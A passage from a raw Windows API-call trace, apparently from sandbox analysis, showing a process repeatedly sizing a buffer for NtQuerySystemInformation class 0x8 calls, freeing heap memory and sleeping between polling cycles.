returned 0x29585b8 [0218.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.725] Sleep (dwMilliseconds=0x110) [0218.853] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.853] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.853] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.964] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.971] Sleep (dwMilliseconds=0x110) [0219.027] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.027] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.036] Sleep (dwMilliseconds=0x110) [0219.103] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.103] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.103] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.103] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.104] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.104] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.104] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.104] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.105] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.105] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.106] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.108] Sleep (dwMilliseconds=0x110) [0219.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.165] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.165] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.166] Sleep (dwMilliseconds=0x110) [0219.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.347] Sleep (dwMilliseconds=0x110) [0219.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.464] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.464] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.469] Sleep (dwMilliseconds=0x110) [0219.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.512] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.512] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.512] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.522] Sleep (dwMilliseconds=0x110) [0219.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.555] Sleep (dwMilliseconds=0x110) [0219.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.563] Sleep (dwMilliseconds=0x110) [0219.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.587] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.588] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.588] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.588] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.588] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.589] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.589] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.590] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.590] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.590] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.593] Sleep (dwMilliseconds=0x110) [0219.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.626] Sleep (dwMilliseconds=0x110) [0219.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.646] Sleep (dwMilliseconds=0x110) [0219.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.661] Sleep (dwMilliseconds=0x110) [0219.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.678] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 